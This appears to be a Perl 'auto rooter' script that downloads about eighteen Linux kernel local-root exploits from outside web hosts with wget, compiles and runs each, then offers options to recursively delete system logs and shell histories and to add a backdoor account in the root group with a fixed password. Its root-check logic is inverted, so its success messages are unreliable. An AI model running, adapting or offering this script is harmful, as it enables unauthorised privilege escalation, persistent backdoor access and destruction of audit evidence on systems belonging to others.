aroot.pl

1. #!/usr/bin/perl
2.  
3.  
4. print "###########################################################\n";
5. print "# Auto rooter by #0xide #\n";
6. print "# Usage : #\n";
7. print "# perl $0 r00t => To root #\n";
8. print "# perl $0 delete => Delete Exploit #\n";
9. print "# perl $0 UserAdd => Add Root Account #\n";
10. print "# ******************************************** #\n";
11. print "# #\n";
12. print "# #\n";
13. print "#####################################################################\n\n\n";
14. print "Gathering Exploit Database \n";
15. print "18 exploits found \n";
16. system("uname -a");
17. system("id;pwd");
18.  
19. check_root();
20.  
21.  
22.  
23.  
24. if ($ARGV[0] =~ "r00t" ) {
25.  
26.  
27.  
28.  
29. print "Trying wunderbar_emporium..\n";
30. system("wget http://www.a4architect.com/wp-content/uploads/sock-sendpage-local-root-exploit/wunderbar_emporium.sh");
31. system("chmod 777 wunderbar_emporium.sh");
32.  
33. system("./wunderbar_emporium.sh");
34. check_root();
35.  
36.  
37.  
38.  
39.  
40.  
41.  
42.  
43. print "trying half-Nelson..\n";
44. system("wget http://jon.oberheide.org/files/half-nelson.c");
45. system(" gcc -o half_Nelson half-nelson.c");
46. system("./half_Nelson");
47. check_root();
48.  
49. print " Trying mempodipper CVE_2012-0056 jan 21 2012..\n";
50. system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/51625.c");
51. system("gcc -o MempoDip 51625.c");
52. system("./MempoDip");
53. check_root();
54.  
55. print " Trying Linux Kernel 'MSR' Driver Local Privilege Escalation Vulnerability..\n";
56. system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/57838.c");
57. system("gcc -o LinuxKMsr 57838.c");
58. system("./LinuxKMsr");
59. check_root();
60.  
61. print "Trying Diane Lane gets Fucked Hard..\n";
62. system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704-2.c");
63. system("gcc -o diane 27704-2.c");
64. system("./diane");
65. check_root();
66.  
67.  
68. print "Trying gayros...\n";
69. system("wget http://www.fotis.loukos.me/security/exploits/gayros-2.c");
70. system("gcc -o gayros local-root-exploit-gayros.c");
71. system("chmod 777 gayros");
72. system("./gayros");
73.  
74.  
75. check_root();
76.  
77.  
78.  
79.  
80.  
81.  
82. print "Trying vmsplice...\n";
83. system("wget http://www.marsaud.org/divers/vmsplice-local-root-exploit.c");
84. system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c");
85. system("chmod 777 vmsplice-local-root-exploit");
86. system("./vmsplice-local-root-exploit");
87. check_root();
88.  
89.  
90.  
91.  
92. print "Trying 2.4-2.6 [ pwned ] localroot...\n";
93. system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/pwnedUselibKernelExploit.c");
94. system("gcc pwnedUselibKernelExploit.c -o pwned");
95. system("chmod 777 pwned");
96. system("./pwned");
97. check_root();
98.  
99. print "Trying 2.6.4 [ hudo ] localroot...\n";
100. system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/hudo.c");
101. system("gcc hudo.c -o hudo");
102. system("chmod 777 hudo");
103. system("./hudo");
104. check_root();
105.  
106. print "Trying 2.6.9-22 [ prctl ] localroot...\n";
107. system("wget http://www.0xdeadbeef.info/exploits/raptor_prctl.c");
108. system("gcc raptor_prctl.c -o prctl");
109. system("chmod 777 prctl");
110. system("./prctl");
111. check_root();
112.  
113. print "Trying 2.6.12 [ elfcd2 ] localroot...\n";
114. system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/elfcd2.c");
115. system("gcc elfcd2.c -o elfcd2");
116. system("chmod 777 elfcd2");
117. system("./elfcd2");
118. check_root();
119.  
120.  
121. print "Trying 2.6.13-17 localroot...\n";
122. system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/2.6.13_17_4_2011.sh");
123. system("chmod 755 2.6.13_17_4_2011.sh");
124.  
125. system("./2.6.13_17_4_2011.sh");
126.  
127. check_root();
128.  
129.  
130.  
131.  
132. print "Trying 2.6.14 [ raptor ] localroot...\n";
133. system("wget http://www.0xdeadbeef.info/exploits/raptor_udf.c");
134. system("gcc raptor_udf.c -o raptor_udf");
135. system("chmod 777 raptor_udf");
136.  
137. system("./raptor_udf");
138. check_root();
139.  
140.  
141.  
142. print "Trying 2.6.15 [ raptor ] localroot...\n";
143. system("wget http://www.0xdeadbeef.info/exploits/raptor_ldpreload.c");
144. system("gcc raptor_ldpreload.c -o raptorpreload");
145. system("chmod 777 raptorpreload");
146.  
147. system("./raptorpreload");
148. check_root();
149.  
150.  
151.  
152. print "Trying 2.6.x localroot...\n";
153. system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/exp.sh");
154. system("chmod 755 exp.sh");
155. system("./exp.sh");
156. check_root();
157.  
158.  
159. print "Trying 2.6.x [ elflbl ] localroot...\n";
160. system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/elflbl");
161. system("chmod 777 elflbl");
162. system("./elflbl");
163. check_root();
164.  
165.  
166.  
167. print "Trying 2.6.x [ cw7.3 ] localroot...\n";
168. system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/cw7.3");
169. system("chmod 777 cw7.3");
170. system("./cw7.3");
171. check_root();
172.  
173.  
174. }
175.  
176. sub check_root() {
177. my $login = (getpwuid $>); die "You've not root." if $login eq 'root';
178.  
179.  
180. print "the exploit appears to have been succesful it is recommended to delete exploit files\n\n";
181.  
182.  
183.  
184. #cleanup();
185.  
186.  
187.  
188.  
189.  
190.  
191.  
192. }
193.  
194. sub wipe_logs()
195. {
196. print "rm -rf Log [ rm ] \n";
197. system ("rm -rf /tmp/logs");
198. system ("rm -rf /root/.ksh_history");
199. system ("rm -rf /root/.bash_history");
200. system ("rm -rf /root/.bash_logout");
201. system ("rm -rf /usr/local/apache/logs");
202. sleep(2);
203. system ("rm -rf /usr/local/apache/log");
204. system ("rm -rf /var/apache/logs");
205. system ("rm -rf /var/apache/log");
206. system ("rm -rf /var/run/utmp");
207. system ("rm -rf /var/logs");
208. system ("rm -rf /var/log");
209. sleep(2);
210. system ("rm -rf /var/adm");
211. system ("rm -rf /etc/wtmp");
212. system ("rm -rf /etc/utmp");
213. system ("cd /bin");
214. print "completed ... \n\n";
215.  
216. }
217.  
218. sub cleanup(){
219.  
220.  
221. print "All Exploits Files Are Being Deleted ...\n";
222.  
223.  
224.  
225.  
226.  
227.  
228.  
229. #system("rm wunderbar_emporium.sh;rm -rf half-nelson.c;rm 51625.c;rm -rf 57838.c;rm -rf 27704-2.c;rm -rf local-root-exploit-gayros.c;rm -rf vmsplice-local-root-exploit.c;rm -rf pwnedUselibKernelExploit.c;rm -rf hudo.c");
230. #system("rm raptor_prctl.c;rm -rf elfcd2.c;rm 2.6.13_17_4_2011.sh;rm -rf raptor_udf.c;rm -rf raptor_ldpreload.c;rm -rf exp.sh;rm -rf elflbl;rm -rf cw7.3");
231.  
232.  
233.  
234. }
235.  
236. if ($ARGV[0] =~ "delete" ){
237. cleanup();
238. }
239.  
240. if ($ARGV[0] =~ "remove" )
241. {
242. wipe_logs();
243. }
244. if ($ARGV[0] =~ "UserAdd" )
245. {
246. print "Add Root Account [ t ]\n";
247. print "useradd : [ root0xide ]\n";
248. system ("useradd root0xide -g 0 autoroot -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh");
249. system ("passwd root0xide");
250. print "pass is : root0xide right it down check it twice \n";
251. sleep(2);
252.  
253. }